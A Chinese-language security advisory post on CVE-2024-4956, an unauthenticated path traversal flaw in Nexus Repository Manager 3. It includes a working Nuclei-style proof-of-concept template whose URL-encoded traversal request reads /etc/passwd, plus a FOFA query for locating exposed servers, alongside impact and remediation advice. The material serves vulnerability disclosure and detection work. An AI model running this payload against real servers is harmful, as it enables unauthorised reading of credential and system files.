CVE-2024-4956: Nexus Repository Manager 3 未经认证的路径遍历漏洞

admin 2024年6月12日11:37:55评论38 views字数 1149阅读3分49秒阅读模式

漏洞描述

Nexus Repository Manager 3 是一个流行的仓库管理工具,用于存储和管理软件组件。该漏洞允许攻击者通过构造特定的请求,未经认证地访问系统上的任意文件。这是由于路径遍历漏洞造成的,攻击者可以利用该漏洞读取系统上的敏感文件。

漏洞利用细节

通过向Nexus Repository Manager 3发送特定的路径遍历请求,攻击者可以读取系统上的敏感文件,如/etc/passwd。以下是一个利用此漏洞的POC示例:

请求示例

CVE-2024-4956: Nexus Repository Manager 3 未经认证的路径遍历漏洞

id: CVE-2024-4956-POCinfo:  name: Nexus Repository Manager 3 Unauthenticated Path Traversal  author: banditz  severity: highmetadata:   fofa-query: app="Nexus-Repository-Manager"requests:  - method: GET    path:      - '{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd'    matchers:      - type: word        words:          - "root:.*:0:0"        part: body
解释

上述POC中,通过向Nexus Repository Manager 3发送一个特制的HTTP GET请求,路径包含多个%2F(即斜杠/的URL编码),结合路径遍历字符..,最终目标是访问/etc/passwd文件。若请求成功,将在响应体中包含root:.*:0:0等标识符,表明系统的/etc/passwd文件被读取。

漏洞影响

该漏洞影响使用Nexus Repository Manager 3的系统,攻击者可利用此漏洞读取系统上的任意文件,可能导致敏感信息泄露,如用户凭证和系统配置文件。

修复建议

为了防止此漏洞被利用,建议采取以下措施:

  1. 更新软件:及时将Nexus Repository Manager 3更新至最新版本,以确保修复已知的安全漏洞。

  2. 限制访问:通过防火墙和访问控制列表,限制对Nexus Repository Manager 3服务的访问,仅允许可信任的IP地址进行访问。

  3. 监控和检测:使用入侵检测系统(IDS)和入侵防御系统(IPS),监控和检测可疑的请求和活动。

结语

CVE-2024-4956是一个严重的路径遍历漏洞,影响Nexus Repository Manager 3。用户应及时采取措施修复漏洞,以确保系统的安全性。同时,保持软件的定期更新和安全配置是防范此类漏洞的关键。

原文始发于微信公众号(云梦安全):CVE-2024-4956: Nexus Repository Manager 3 未经认证的路径遍历漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月12日11:37:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-4956: Nexus Repository Manager 3 未经认证的路径遍历漏洞https://cn-sec.com/archives/2841333.html

发表评论

匿名网友 填写信息